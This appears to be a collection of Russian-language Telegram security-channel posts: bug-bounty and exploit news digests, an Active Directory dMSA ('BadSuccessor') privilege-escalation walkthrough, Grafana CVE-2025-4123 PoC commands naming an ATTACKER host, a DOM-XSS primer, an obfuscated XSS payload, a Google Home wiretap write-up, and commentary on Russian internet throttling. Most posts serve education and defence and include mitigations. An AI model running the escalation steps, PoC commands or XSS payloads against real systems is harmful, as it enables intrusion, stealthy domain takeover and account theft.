по приколу, offtopic, классика
https://www.youtube.com/watch?v=BLe2IoGXBMU

🔥 Заскочили за самыми сочными баунти-и-не-только новостями — раздаём одним потоком!

Пока вы доливаете кофе, исследователь [Monika Sharma](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4) сварила эксплойт-коктейль из *proxy-misconfig* + SSRF и с кастетом ворвалась во внутреннюю админку. Итог — солидный чек и урок: «мелочи», собранные в цепочку, иногда громче 0-day.

В соседнем BI-зоопарке [Pentaho Business Server](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73) снова споткнулся о «дефолтные креды + злой отчёт» — и получил RCE. Репорт-директор без строгих ограничений = удалённая шелуха.

А вот XWiki выдала CVE-2025-32969 (CVSS 9.8) — слепой SQL-инжект даже при полном бане анонимов. Патч до 16.10.1 обязателен, иначе ваши вики-мысли могут читать все, кроме вас. 🔨 [Детали](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)

На большом полит-ринге жюри приговорило NSO Group к $168 млн за Pegasus-атаку на WhatsApp — [хроника исторического пенальти](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack). Meta открыла шампанское, но эксперты ворчат: «Pegasus сменит шкуру и вернётся».

IoT-периферия тоже фонтанирует: хулиганы уже впрягли дырявые GeoVision и [Samsung MagicINFO](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html) в свежий Mirai-ботнет. Любите яркие уличные дисплеи? Проверьте, чтобы они не светили *DDoS incoming*.

И на десерт — Kali GPT: представьте ChatGPT в худи Kali Linux, который шепчет nmap -sC -sV, спорит о payload-ах и учит обходить WAF. Машины обучают нас ломать машины — круг замкнулся.

👉 Вывод: патчимся быстро, баги ищем изобретательно; словили инсайт — жмите 🔥, кидайте друзьям-хакерам и пишите, какой баг сделал ваш июнь!

---

Источники

1. [Proxy Misconfiguration + SSRF — InfoSec Write-ups](https://infosecwriteups.com/proxy-misconfiguration-ssrf-how-i-chained-two-bugs-into-internal-admin-panel-access-cf0e43bf79e4)
2. [RCE в Pentaho Business Server — InfoSec Write-ups](https://infosecwriteups.com/remote-code-execution-in-pentaho-business-server-d5abb6529f73)
3. [CVE-2025-32969 — NVD](https://nvd.nist.gov/vuln/detail/CVE-2025-32969)
4. [NSO Group vs WhatsApp — The Record](https://therecord.media/jury-orders-nso-to-pay-meta-168-million-over-whatsapp-hack)
5. [Mirai через Samsung MagicINFO & GeoVision — The Hacker News](https://thehackernews.com/2025/05/hackers-exploit-samsung-magicinfo.html)
6. [“AI MEET HACKING — Kali GPT” — Medium](https://medium.com/p/0d726e73b733)

🔥 BadSuccessor — свежая головная боль для админов AD

В мае 2025 г. исследователи показали, как с нуля получить права Domain Admins через новую функцию Windows Server 2025 — *delegated Managed Service Accounts* (dMSA).
Во время миграции сервис‑аккаунтов контроллер домена по ошибке добавляет в PAC dMSA SID старого аккаунта и все его группы.
Это даёт атакующему прямой лифт вверх по привилегиям.

Как пройти путь до домена‑админа в четыре шага

1. Нужны права CreateChild на любую OU. Такие права часто лежат у технических учёток.
2. Создаём собственный dMSA:

   New-ADServiceAccount evil$ …
   

3. Меняем два атрибута:

   msDS-ManagedAccountPrecededByLink → DN цели (пример: Administrator)
   msDS-DelegatedMSAState           → 2
   

4. Запрашиваем TGT через модифицированный Rubeus:

   Rubeus asktgt /user:evil$ /dmsa
   

В ответном PAC уже сидят SID групп Domain Admins, и мы сразу правим доменом — без смены паролей и без добавления себя в группы.

Почему SOC почти ничего не увидит

* Мы не трогаем объект администратора, триггер «добавили в Domain Admins» молчит.
* Идут обычные LDAP‑ и Kerberos‑запросы, IDS считает трафик нормальным.
* Патча и CVE нет — Microsoft пока думает.

Как закрыть брешь

* Проверьте ACL и заберите право Create msDS-DelegatedMSA там, где оно не нужно.
* Если dMSA не используете, временно отключите их:

  HKLM\System\CurrentControlSet\Control\Lsa\EnableDMSA = 0
  

* Ловите события 5136 и 4662 по изменению двух атрибутов и связывайте их с выдачей TGT тому же dMSA в течение пяти минут.
* Добавьте сигнатуры на PoC‑файлы: SharpSuccessor*, BadSuccessor*, Rubeus-dmsa.

Эксплойт в паблике с 21 мая 2025 г. Проверьте, не появился ли у вас собственный «преемник‑админ». 💀

🛠 #BugBounty | Grafana CVE‑2025‑4123

Что случилось. 21 мая 2025 года вышел патч Grafana 12.0.0+security‑01. Он закрывает цепочку из трёх багов, которая давала полный захват аккаунта и доступ к внутренней сети. Уязвимость жила в проде примерно полтора года.

Как работает атака.

1. Статический хендлер принимает любой путь после /public/. Он нормализует его и, если папка существует, отвечает 302 Found. Go‑функция http.Redirect сначала разбирает «?», потом путь. На диске остаётся верный каталог, а в 302‑заголовке уходит protocol‑relative ссылка //attacker.com/… — открытый редирект.
2. Во фронтенде есть client‑side path traversal: /invite/..%2f..%2f…
3. Для рендеринга дашбордов Grafana поднимает headless Chromium и принимает только относительные пути. Мы соединяем редирект и traversal. Headless‑браузер идёт во внутренний сервис (полный SSRF). Одновременно traversal подсовывает плагин с нашего сервера. В его манифесте поле module указывает на вредный JS. Браузер запускает скрипт, и мы меняем e‑mail и пароль жертвы.

Как повторить.

git clone https://github.com/NightBloodz/CVE-2025-4123
cd CVE-2025-4123 && sudo python server.py --host http://ATTACKER

Скрипт покажет две ссылки: первая вызывает XSS, вторая — SSRF.

Почему цепочка в бб самая яркая за май. Цепочка «open redirect → client traversal → headless SSRF» встречается редко. Всё начинается с мелкого редиректа, а заканчивается полным захватом. Intigriti платит за такие репорты 6–10 k €. Отчёт приняли меньше чем за сутки. PoC на GitHub собрал 30+ звёзд за неделю.

Как защититься.
• Обновитесь до 12.0.0+security‑01 или свежих патч‑релизов 11.x.
• Если image renderer не нужен, отключите /render/*.
• На реверсе блокируйте protocol‑relative URL и закройте /render/* от внешки.
• Добавьте CSP: frame‑src 'none'; script‑src 'self'. Это режет XSS, хотя не закрывает SSRF.

Источники:
— Grafana Labs, security release CVE‑2025‑4123, 21.05.25.
— Balada A., «Grafana CVE‑2025‑4123: Full‑Read SSRF & Account Takeover», 22.05.25.
— NightBloodz, «CVE‑2025‑4123 Exploit PoC», GitHub, 02.06.25.

🔒 Bitrix — боль даже для закалённых AppSec-спецов

«Привет, я пентестер, которому снова достался портал на 1С‑Bitrix. Делюсь реальным опытом описания чудовищ которых приходится аудитить.»

«Не призывай то, что не сможешь укротить.» — Г. Ф. Лавкрафт

1. Это не CMS, а швейцарский нож боли, где каждое лезвие может порезать. CRM, телефония, диски, почта, DAV — поверхность атаки размером с планету.

2. Legacy‑PHP на стероидах.
Ядро Bitrix — крупный PHP‑монолит, наследующий практики ≈ PHP 5/7: глобальные переменные, динамические include, слабая типизация. При аудите это приводит к каскадам потенциальных XSS/SQLi, а исправление одного модуля часто требует правки ядра, что ломает обратную совместимость. Даже сами разработчики предупреждают, что изменение ядра лишает возможности получать патчи — значит, команда безопасности оказывается перед выбором «фикс или апдейт, но не оба» .

3. RCE прилетают как времена года. Последние: CVE‑2024‑34883 и CVE‑2023‑1714. Вопрос всего один: кто победит в гонке — патч или хакер?

4. Пароли светятся как ёлка. SMTP/LDAP/DAV‑секреты хранятся почти в plain‑text и легко вытаскиваются через API.

5. «У нас встроенный WAF, всё нормально!» — говорят админы и спокойно спят... пока одна десериализация не превращает сон в кошмар.

6. Обновить страшно, не обновлять — страшнее. Кастомные модули + бизнес‑логику никто не тестил; патч может всё сломать, поэтому люди живут на версиях 2022 года.

Что сделать уже завтра?

Снести.

Выключить ненужные модули и интеграции.

Перенести Bitrix в отдельный сегмент, спрятать за реальным WAF/IPS.

Настроить автоматические обновления и CI/CD.

Пентест — раз в год, мониторинг CVE — ежемесячно.

Критичное постепенно выносить в микросервисы/серверлесс.

#Bitrix #AppSec #Pentest #CVE #InfoSec 🚀

Итого: безопасность Bitrix осложняют не столько отдельные баги, сколько сочетание монолитного устаревшего ядра, повторяющихся ошибок в защите конфиденциальных данных, высокой доли непатченных инсталляций и культурно‑экономической модели, при которой кастомизация важнее своевременных апдейтов. Пока не изменятся процессы разработки и распространения, «постоянно закрывать новые дыры» — единственная реальная стратегия.

📌 DOM‑XSS: полный разбор — от простых багов до экстремальных цепочек

---

1. Что такое DOM‑XSS

• Вредоносный JavaScript рождается в *браузере*, а не в HTTP‑ответе.
• ИСТОЧНИКИ: location, hash, search, cookies, postMessage, Web‑Storage.
• СИНКИ: innerHTML, document.write(), insertAdjacentHTML(), dangerouslySetInnerHTML, setAttribute().

2. Чем DOM‑XSS отличается от остальных

Тип           | Где payload   | Когда выполняется  | Ошибка
------------- | ------------- | ------------------ | ---------
Stored        | сервер        | при каждом рендере | backend
Reflected     | HTTP‑ответ    | сразу после клика  | backend
DOM‑XSS       | браузер       | при работе JS      | frontend

3. Классика

// hash → innerHTML
document.body.innerHTML = location.hash.substr(1);

// search → document.write
document.write(decodeURIComponent(location.search));

// jQuery ≤ 3.4.1
$(...).html('<img src=x onerror=alert(1)>');

4. Средний уровень

• mXSS: мутирующая разметка обходит DOMPurify.
• DOM‑clobbering: подмена document.forms[0], window.name.
• CSTI: {{constructor.constructor('alert(1)')()}} в Handlebars/Vue ≤ 2.6.

5. Эксперт‑зона (экстремальные цепочки)

1. mXSS + sanitizer bypass: «сломанный» <svg> выживает очистку и мутирует в XSS.
2. Clobbering ⇒ CSP bypass ⇒ SW hijack: подменяем узел и перехватываем Service Worker.
3. Prototype pollution ⇒ React sink: location.hash → Object.prototype → innerHTML.
4. Scriptless XSS via: values="javascript:…", CSP‑friendly.

🔓 EXPLOIT‑дайджест

Пятница выдалась жаркой: пока многие жарят шашлыки, уязвимости жарят продакшн‑серверы.

— — —

1️⃣ RCE в WebDAV (CVE‑2025‑33053)
Один клик по специально сформированному .url — и удалённое выполнение кода на всех поддерживаемых версиях Windows. Microsoft уже выкатил патч, но PoC ходит по закрытым каналам.
Временная затычка: отключите службу WebClient и запретите WebDAV‑трафик на периметре.

2️⃣ «Три двойки» Cloudflare: 503 × 2 ч 28 мин
12 июня глобальный сбой уложил Workers KV, Access, Turnstile и часть дашборда. Причина — сбой стороннего хранилища.

3️⃣ WordPress Workreap ≤ 3.3.2 (CVE‑2025‑5012)
200 k+ сайтов открыты для произвольной загрузки файлов даже подписчиками. Кладём `resume.php` — получаем shell. Версия 3.3.3 уже содержит фикс; проверьте автообновление.

4️⃣ Google Сhrome залатал две high‑severity🚒 дыры — UAF (CVE‑2025‑5063) и OOB write (CVE‑2025‑5280). Госагентствам США приказано патчиться до 5 июня.

5️⃣ Pentest‑ИИ: PentestGPT vs Mindgard
• PentestGPT — терминальный «ментор», быстро штампует корявые payload‑ы, но буксует на lateral movement (на самом деле он просто не очень мягко говоря)
• Mindgard — взял «Лучший AI‑Sec стартап 2025», уже встроен в GitLab CI

Детекты походу лабу сделали на это)
Прикольный разбор
https://t.me/deteact/21

Привет Биконовцы!👋
Самым «кибер‑кинематографичным» баг‑баунти‑приключением последних пяти лет, без преувеличения, стала история исследователя‑одиночки Мэтта Кунзе и его Google Home Mini. За одиннадцать месяцев парень, вооружённый mitmproxy, Frida и стареньким рутованным Android‑смартфоном, превратил банальную колонку‑ассистента в многофункциональный жучок и получил от Google 107 500 $ — рекордную для IoT‑класса выплату.

Суть трюка: колонка доверяет любому «пользователю», чьи имя, сертификат и cloud ID будут отправлены на закрытый API Google. Эти три параметра легко вытаскиваются из локального HTTPS‑интерфейса устройства (порт 8443), если сначала перехватить трафик приложения Google Home. Кунзе снял SSL‑пиннинг Frida‑скриптом, увидел protobuf‑запрос deviceuserlinksbatch и воспроизвёл его Python‑скриптом, подменив данные на свои. Так он зарегистрировал «теневой» аккаунт, получив полный контроль над колонкой 

Дальше исследователь задался вопросом: «А можно ли сделать атаку бесследной и удалённой?» Ответ оказался «да». Шаг первый – обрушить Wi‑Fi жертвы парой deauth‑пакетов; Google Home сразу уходит в режим первоначальной настройки, поднимает открытый хот‑спот и на том же порту 8443 без аутентификации раздаёт всё то же имя‑сертификат‑cloud ID. Шаг второй – с любого интернета отправить знакомый protobuf‑линк на сервера Google Cast. После этого колонка готова исполнять команды злоумышленника из‑за океана, а сама жертва даже не подозревает, что в «друзьях» появился кто‑то ещё

Самый зрелищный вектор, описанный в репорте: злоумышленник создаёт рутину «Call +1‑555‑…» с точным временем запуска до секунды. В назначенный момент колонка сама набирает номер и превращается в беспроводной микрофон с неограниченным радиусом действия. Параллельно через те же облачные API можно сканировать локальную сеть, слать произвольные HTTP‑запросы и даже читать/писать файлы на устройстве – всё легально, ведь «новый пользователь» формально авторизован

Почему эта техника считается буквально воплощением хакерского искусства? Во‑первых, она ломает сразу три рубежа – BLE/Wi‑Fi, облако Google и физическое устройство – без эксплойтов нулевого дня; всё строится на нетривиальной комбинаторике легитимных функций. Во‑вторых, атака масштабируется: подобные smart‑спикеры десятками тысяч экспонируются в интернет из‑за кривых UPnP‑настроек маршрутизаторов. В‑третьих, репорт показал, что классические IoT‑грабли (открытый хот‑спот в режиме сетапа) прекрасно дожили до 2023 года и всё ещё дают RCE‑эффект. Google пришлось менять процесс линковки аккаунтов, урезать возможности рутин и закрывать 9222/CDP‑порт для локальных действий – редкий случай, когда баг‑баунти тянет почти на полноценный пентест экосистемы.

Для специалистов главный урок прост: если устройство умеет «привязывать» аккаунты через облако, считайте этот механизм вторым паролем и защитите его так же тщательно, как экран блокировки. А любителям баг‑баунти заметка в блокнот: сочетание MITM‑трафика, protobuf‑реверса и «физики» (deauth) до сих пор приносит шестизначные гонорары.

Список источников

1. Kunze M. Turning Google smart speakers into wiretaps for \$100k – 26 дек. 2022.
https://downrightnifty.me/blog/2022/12/26/hacking-google-home.html

2. Toulas B. Google Home speakers allowed hackers to snoop on conversations* – BleepingComputer, 29 дек. 2022.
https://www.bleepingcomputer.com/news/security/google-home-speakers-allowed-hackers-to-snoop-on-conversations

3. https://www.securityweek.com/researcher-says-google-paid-100k-bug-bounty-smart-speaker-vulnerabilities/ "Researcher Says Google Paid $100k Bug Bounty for Smart Speaker Vulnerabilities - SecurityWeek"

Ды вы охренели !

XSS payload, Cuneiform-alphabet based

"><img/src=x onerror="𐂃='',𐃨=!𐂃+𐂃,𐂝=!𐃨+𐂃,𐃌=𐂃+{},𐁉=𐃨[𐂃++],𐃵=𐃨[𐂓=𐂃],𐀜=++𐂓+𐂃,𐂠=𐃌[𐂓+𐀜],𐃨[𐂠+=𐃌[𐂃]+(𐃨.𐂝+𐃌)[𐂃]+𐂝[𐀜]+𐁉+𐃵+𐃨[𐂓]+𐂠+𐁉+𐃌[𐂃]+𐃵][𐂠](𐂝[𐂃]+𐂝[𐂓]+𐃨[𐀜]+𐃵+𐁉+'(document.domain)')()"

#этопотомучтовывцерковьнеходите

Пацаны защитил 2 диплома по двум вузам сегодня и вчера🥳, хочу сказать всем спасибо что вы такие крутые и поддерживали своими реакциями и комментариями на протяжении времени пока я учился, это укрепляло менталку и в целом показывало, что иду в правильном направлении. Вы лучшие подписчики и аудитория🥹
(А я обязательно отосплюсь сегодня ахах)

Btw - еще посылка пришла с розыгрыша https://t.me/sapronoff1
Обещал, что сделаю распаковку)

Подписчик, привет. Это я - твой единственный админ. Я на протяжении многих лет создавал иллюзию того, что в твоём аккаунте много каналов, но это был я. Сейчас напишу это сообщение с других каналов.

Об интернете в РФ. Короткая хроника

Российский сегмент интернета вступил в новую фазу самоизоляции. С 9 июня 2025 г. крупные провайдеры (Ростелеком, «Мегафон», «ВымпелКом», МТС, МГТС) режут любой трафик к сетям Cloudflare до символических 16 Кбайт на соединение. (link) Cloudflare фиксирует 50‑процентное падение трафика из РФ; идут не блоки, а тонкое формирование внутри DPI‑комплексов ТСПУ, развёрнутых Роскомнадзором на узлах связи. Внешне сайт «частично грузится», но дальше первого TCP‑окна всё умирает – идеальная дымовая завеса для обывателя (Опять американцы блочат!!!!🙂), но полный крах для веб‑приложений.

Что произошло раньше и как мы сюда пришли...

Февраль 2022 – блокировка Facebook/Instagram, старт экспресс‑развёртывания DPI.
Март 2023 – запрет «пропаганды VPN»; к концу года Роскомнадзор удаляет >6000 VPN‑сайтов.
Август 2024 – эксперименты по замедлению YouTube: средняя скорость падает вчетверо, создавая ажиотаж вокруг VK Видео
Сентябрь 2024 – правительство выделяет 60 млрд ₽ на модернизацию ТСПУ: добавить новые сигнатуры и повысить «эффективность против VPN» до 96 %
Март 2025 – локальная блокировка Telegram в Дагестане и Чечне, отработан механизм региональных «рубильников». (link)
Апрель 2025 – закон об отказе в рекламе на «заблокированных площадках» с сентября; монетизация иностранного контента становится "токсичной".
Июнь 2025 – «16 КБ‑занавес» против Cloudflare; параллельно из российских App Store массово исчезают мелкие VPN‑клиенты.

Почему Роскомнадзор снова «стрельнул себе в ногу»? C технической точки зрения.
Cloudflare обслуживает примерно пятую часть глобального веба, включая сотни российских компаний (интернет‑магазины, SaaS, банковские фронтенды). Ограничив её, регулятор одним выстрелом обрушил:
1) Cкорость интернета в РФ: пользователи переключаются на «толстые» VPN / обфускацию, а это нагружает DPI сильнее и ещё сильнее снижает пропускную способность для всего трафика.
2. Скорость легальных российских сервисов, вынужденных менять Cloudflare (продукт использующий весь мир) на отечественные (относительно новые) CDN‑«прокси»;
3. Самое смешное что многие телефоны и компьютеры внутренне имеют приложения которые сами по себе обращаются к сервисам под cloudflare

Итог - средняя «реальная» скорость внешних соединений из РФ в июне‑июле 2025‑го упала на 30–40 %, по данным NetBlocks и независимых мониторингов. Обрывочные «пакеты» заставляют браузеры и мобильные приложения агрессивно ретраить, создавая лавину лишнего мусора – провайдеры вынуждены поднимать цену на внешние каналы, а абонент чувствует «интернет как в 2007‑м».
Современная VPN‑картина в РФ. Трафик к популярным коммерческим VPN провайдерам уже давно блокируется подсетями, но теперь DPI режет и TLS ESNI, и маскировку под HTTPS/QUIC. Обход возможен (domain fronting, самописные obfs‑плагины ну и различные специфические протоколы), но цена – двойное шифрование → +20‑25 % латентности и потеря 10‑15 % пропускной. Чем сильнее РКН давит, тем медленнее «белый» сегмент для всех, включая госпорталы.

Все это сводится к тому - что сама инициатива безопасного интернета рушит экономику и замедляет общий интернет, как кажется регуляторам, под благими намерениями.

CatAttack - ai redtream)